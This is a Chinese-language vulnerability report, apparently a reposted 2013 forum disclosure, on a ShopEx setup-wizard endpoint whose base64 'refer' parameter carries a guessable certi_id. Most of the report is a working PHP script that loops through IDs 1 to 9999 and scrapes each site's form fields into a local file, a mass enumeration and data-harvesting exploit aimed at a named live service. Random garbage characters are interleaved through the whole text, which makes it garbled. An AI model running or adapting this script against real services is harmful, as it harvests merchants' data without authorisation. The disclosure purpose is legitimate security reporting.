|
|
简要描述:
6 Q$ {; q0 E9 {+ z( RShopEx某接口缺陷,可遍历所有网站% S- u& j6 H/ M v% W2 s2 {
详细说明:
, z& t1 m+ N& n问题出现在shopex 网店使用向导页面
2 X; G+ i7 m. k/ B( _* S; d! K1 N% t& q$ B
/ e1 V+ Z3 y5 U9 V$ b
) c' ~/ ?( x! Q6 x7 ?: x3 }http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0= w( W6 P" x; ]' w5 Z5 t
: Y! G% g" N b$ i4 T& ] S
8 o7 E) a9 r, H o5 f( f5 t* C& V5 X, P: [
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
* m6 K9 Y1 F* ^, J, b1 l6 e, [/ m, Y6 |$ Z( v# T! i0 Q0 L
$ J9 e, z/ M1 X7 [/ r! [: J" N
8 B/ C' E8 j5 l" Z) W @6 k
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 1 W& |$ X( O$ q
# y% Y& @, z! q) ]9 h: J
) h. B) F8 e) G7 D2 O+ p( n
$ E8 c8 _. K% D0 }! d<?php
/ X* M8 T R& w, O7 w4 K6 L
4 Q% k2 q0 S# ?1 K' G" j( X for ($i=1; $i < 10000; $i++) { //遍历
m D( B! L) a8 w7 }' U, V% O2 F% N E$ i6 Q5 ~6 Z. X1 S
ShowshopExD($i);
% w; D6 l8 Y& N& j9 ~: D6 n1 z9 w' |9 Y' s8 R8 V$ h3 i) T
}
$ Y# m, M; x9 X' z2 N' k7 W0 ?) `
8 P* _' n _% U1 R! q function ShowshopExD($cid) {
9 y5 a; W* l* k+ a. `. Q: P X' p/ ^0 ]' @
$url='http://guide.ecos.shopex.cn/step2.php';- \$ ? ?5 {4 u% V1 C6 ]
2 B+ j4 z: R$ L+ p; @ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
% e! z9 G+ R& a5 d$ }& R9 S$ ~
! p3 P5 V8 m! g3 R; o( v5 r $url = $url.'?refer='.$refer;7 r1 m. I* }% I$ ^) j- r1 [6 Y R; {
( d! c& r7 z2 L6 ] $ch = curl_init($url);' e ^2 h+ u e* ]" D' ~
) [8 e" z3 k" M) s
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;) w# \0 e" W6 q1 F, X( p* a; k
, ?/ L, k- q3 P+ f% U
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;0 f! m7 @: Z3 F4 I) Z7 x
6 r) J# i9 y; B3 w1 `6 E* a
$result = curl_exec($ch);
. @, R# R% W( S" O( z0 M1 t
! B, }7 E" u0 T! s/ b. j+ [" S $result = mb_convert_encoding($result, "gb2312", "UTF-8");8 e* O1 }* e/ Y/ f, M- H
3 `9 Y- X& ^# r! u5 [ if(strpos($result,$refer))8 ?) J* E8 t0 J& {5 Q# [) h
, L' S( i3 [2 u; [) e
{
8 A4 ]$ d% u+ P1 W& R& J5 T q* n. m+ f4 S
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件1 z" n" D* d9 f7 ~2 S- O
* C: \, i0 H* S) U4 N, I; B- ^ preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
0 U q2 v0 ]" m3 O! u& q6 _3 r, [2 [- \ x4 y% J5 e" W7 f( T: D
foreach ($value[1] as $key) {
! z) J, ~. w, r. e0 y- m F' `) R- J- z- w6 x6 r3 d
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
: X$ ?; J9 E5 a) `' G; y( O3 W Z1 V+ {. O5 I
echo $res[1][0].':'.$res[3][0]."\r\n";
8 A4 F, |3 @4 S, H
) \. e9 U! F' l! @ $col =$res[1][0].':'.$res[3][0]."\r\n";
; x; ?# \( {0 e; ^# a3 C
: h+ k3 C4 M/ X1 y+ | fwrite($fp, $col, strlen($col));
: h% A# @- N% q& c' p* [* r1 V4 h8 ~2 u% W6 z6 j y
}
% ?" G- Y# q7 s0 y, D3 x+ Z/ F% _ }+ ?* P* S
echo '--------------------------------'."\r\n";
! H2 z6 V# C s- y' i' a2 w- c! G$ |5 K' [$ p
fclose($fp); 1 f$ O( C9 l3 l0 p' @
8 E$ `; w4 e; c5 S$ A# u5 y+ P, B }$ M1 s8 f% Y. e2 Y
( X! H8 o0 z3 O. r" u' M3 `
flush();& r( r7 I+ P5 K+ U. L, b" m
* K" A0 g1 g- ]# R: E curl_close($ch);0 }" t/ J3 E+ _) ~
, p# N3 X( ]8 j, o8 N2 \
}7 [7 l) y; z* K" S5 q7 @, y
: e/ Z, k: n# f K! @ b, z
?>
) g- H$ k" l/ P& N. w漏洞证明:
: J* M% Z0 h: V2 F/ x$ fhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
- w; m! Y, C) p$ b+ N& s6 hrefer换成其他加密方式
$ q* j! L- @" b$ l |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对